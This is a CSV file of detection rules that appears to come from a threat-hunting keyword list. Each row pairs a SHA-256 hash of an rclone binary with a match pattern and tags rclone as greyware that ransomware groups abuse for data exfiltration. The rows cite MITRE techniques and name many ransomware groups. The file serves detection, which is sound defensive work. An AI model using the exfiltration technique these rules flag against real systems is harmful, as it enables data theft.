"*baf423bed15c4ecb7c5df42b23aea20137154e370146e3a834eca0e4cb20c837*",".{0,1000}baf423bed15c4ecb7c5df42b23aea20137154e370146e3a834eca0e4cb20c837.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*baf4b309c7b2064aa60e2e2ceb614f321cd31d3fc1348eee349f19ef0cfbb236*",".{0,1000}baf4b309c7b2064aa60e2e2ceb614f321cd31d3fc1348eee349f19ef0cfbb236.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bb074e0e2302d9d1b31cc2cffec35d81525bd43beee43df3679b9dd8f1e16461*",".{0,1000}bb074e0e2302d9d1b31cc2cffec35d81525bd43beee43df3679b9dd8f1e16461.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bb453ae9686b0b7a3e0000c80811cac81b4a7fde4e5613089681b7d58cd1d6a4*",".{0,1000}bb453ae9686b0b7a3e0000c80811cac81b4a7fde4e5613089681b7d58cd1d6a4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bb735e934251282a349f5bf909d8d52f5a5e4c4adc2423fb4b736d110ff966e1*",".{0,1000}bb735e934251282a349f5bf909d8d52f5a5e4c4adc2423fb4b736d110ff966e1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bb7eb0fdbe238ae66d227a939c6ad718731881dbbe51d3be33409d3cd6276a30*",".{0,1000}bb7eb0fdbe238ae66d227a939c6ad718731881dbbe51d3be33409d3cd6276a30.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bb80873faf22af995e0904aaabb9dad5bde417bc7c670e3bbfde0a8453bb0b00*",".{0,1000}bb80873faf22af995e0904aaabb9dad5bde417bc7c670e3bbfde0a8453bb0b00.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bb8b44e0fab088c4f5e40878b4213ce15fa474763f1355f597b0a6ad2aa96c6d*",".{0,1000}bb8b44e0fab088c4f5e40878b4213ce15fa474763f1355f597b0a6ad2aa96c6d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bb8fda8566da9d054f2dde15f390d5364841c2181f4e278056569ece2fbc1d46*",".{0,1000}bb8fda8566da9d054f2dde15f390d5364841c2181f4e278056569ece2fbc1d46.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bba3aff46b0c7ddecdd62d9c0a5cd90fac59ee40255cb2988cc1c409cd59e822*",".{0,1000}bba3aff46b0c7ddecdd62d9c0a5cd90fac59ee40255cb2988cc1c409cd59e822.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bba5b77e594b8cf6645a2061b7888047b2a32c0fa7e74c54198571128290db69*",".{0,1000}bba5b77e594b8cf6645a2061b7888047b2a32c0fa7e74c54198571128290db69.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bbb47c16882b6c5f2e8c1b04229378e28f68734c613321ef0ea2263760f74cd0*",".{0,1000}bbb47c16882b6c5f2e8c1b04229378e28f68734c613321ef0ea2263760f74cd0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bc03e2ee769df50cc0095ffc64177e3b63a789a64937581820de4a44af1d13f8*",".{0,1000}bc03e2ee769df50cc0095ffc64177e3b63a789a64937581820de4a44af1d13f8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bc8277f174b9c61f32958b2ef583e0efcb82ed8b5892a684f678ec70c70c81ae*",".{0,1000}bc8277f174b9c61f32958b2ef583e0efcb82ed8b5892a684f678ec70c70c81ae.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bcceea9a68e6cc6c2e826f660a7f5656cc4cb930a02e447460166dcab9b2ecf4*",".{0,1000}bcceea9a68e6cc6c2e826f660a7f5656cc4cb930a02e447460166dcab9b2ecf4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bcd93c450ce456b97996771daeb96abb271566e285e369b534cc54c54f8daed8*",".{0,1000}bcd93c450ce456b97996771daeb96abb271566e285e369b534cc54c54f8daed8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bd192e4c9e26c22864669baa728f40edd8ab90a3028801298f34519e624eff59*",".{0,1000}bd192e4c9e26c22864669baa728f40edd8ab90a3028801298f34519e624eff59.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bd26a9a068c1d419bd4829d28254e50e8471d2c38c707c4d9d7a90f0c32783cd*",".{0,1000}bd26a9a068c1d419bd4829d28254e50e8471d2c38c707c4d9d7a90f0c32783cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bde619019885097753f7b2af850a15254df13c486e2bff1ebd009683cc1945d2*",".{0,1000}bde619019885097753f7b2af850a15254df13c486e2bff1ebd009683cc1945d2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bde8471edd6a437d0737e477025d0fc82dec47453f6bcc284c1d093d305f64d8*",".{0,1000}bde8471edd6a437d0737e477025d0fc82dec47453f6bcc284c1d093d305f64d8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*be17212901eb7e1853ddaca18eff5a2520b093e8a049e2074ba845a9ccc05623*",".{0,1000}be17212901eb7e1853ddaca18eff5a2520b093e8a049e2074ba845a9ccc05623.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*be22845ceff07acc3ca02e9e24e1ff70fa71b6689f3f5a5ff4b38f43d4fd61e7*",".{0,1000}be22845ceff07acc3ca02e9e24e1ff70fa71b6689f3f5a5ff4b38f43d4fd61e7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*be3d96e3278af277078db17d19fe4dbd61e55024c07c514cdf99adf586152401*",".{0,1000}be3d96e3278af277078db17d19fe4dbd61e55024c07c514cdf99adf586152401.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*be521ad853a194db441e3731603eff6badef3dae544e44096a7a147fa522b855*",".{0,1000}be521ad853a194db441e3731603eff6badef3dae544e44096a7a147fa522b855.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bee31ef4c9cfb1f2bcc3b662c3102cfbe6a551918d2deac6101459557a3fe0b4*",".{0,1000}bee31ef4c9cfb1f2bcc3b662c3102cfbe6a551918d2deac6101459557a3fe0b4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bef8974161105a23c834764ab11fe51c8d0e4f27fbf6db0739379787d5b7fcda*",".{0,1000}bef8974161105a23c834764ab11fe51c8d0e4f27fbf6db0739379787d5b7fcda.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bf0ae0037ee0bb1c92c22b806b8eb81684cf42f97584cc83a92a9eeeb8537b94*",".{0,1000}bf0ae0037ee0bb1c92c22b806b8eb81684cf42f97584cc83a92a9eeeb8537b94.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bfeba1b9e53be59958266bac950f3f33c687314f751c0b4a97c3536715d0850a*",".{0,1000}bfeba1b9e53be59958266bac950f3f33c687314f751c0b4a97c3536715d0850a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*bffaa8cbe4abb1d535b78acdb84ed93101a1efa7209dfe3d0d034a994c5a60d4*",".{0,1000}bffaa8cbe4abb1d535b78acdb84ed93101a1efa7209dfe3d0d034a994c5a60d4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c01c9a0988791643b5c0ce5936f5328322286b602517718f134ff08564708e14*",".{0,1000}c01c9a0988791643b5c0ce5936f5328322286b602517718f134ff08564708e14.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c026c27681f756eba809e3594254fb9c8a6c9dd2a8c9321df701ade1545c7914*",".{0,1000}c026c27681f756eba809e3594254fb9c8a6c9dd2a8c9321df701ade1545c7914.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c0361de3abb61250d015ba5abb995dcf626abc3ade13953e5d19eaf0d6eee9d3*",".{0,1000}c0361de3abb61250d015ba5abb995dcf626abc3ade13953e5d19eaf0d6eee9d3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c0c761602cda01ee61c21c1fda1a65b806f26a3c36a5f8e60ffa0156b5f1b704*",".{0,1000}c0c761602cda01ee61c21c1fda1a65b806f26a3c36a5f8e60ffa0156b5f1b704.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c0ee4e49713fee5e12d7aea712320640bc9614e95cd5fbbdaaf90803a473a23e*",".{0,1000}c0ee4e49713fee5e12d7aea712320640bc9614e95cd5fbbdaaf90803a473a23e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c1008f9f263336c7ca1bbba0865dd0303653c398c30b41583e95f189db7e9525*",".{0,1000}c1008f9f263336c7ca1bbba0865dd0303653c398c30b41583e95f189db7e9525.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c1013c7a780da71bb3cf7a1e56ca394546cb20b1b6dc89518c5f4dff76c71b64*",".{0,1000}c1013c7a780da71bb3cf7a1e56ca394546cb20b1b6dc89518c5f4dff76c71b64.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
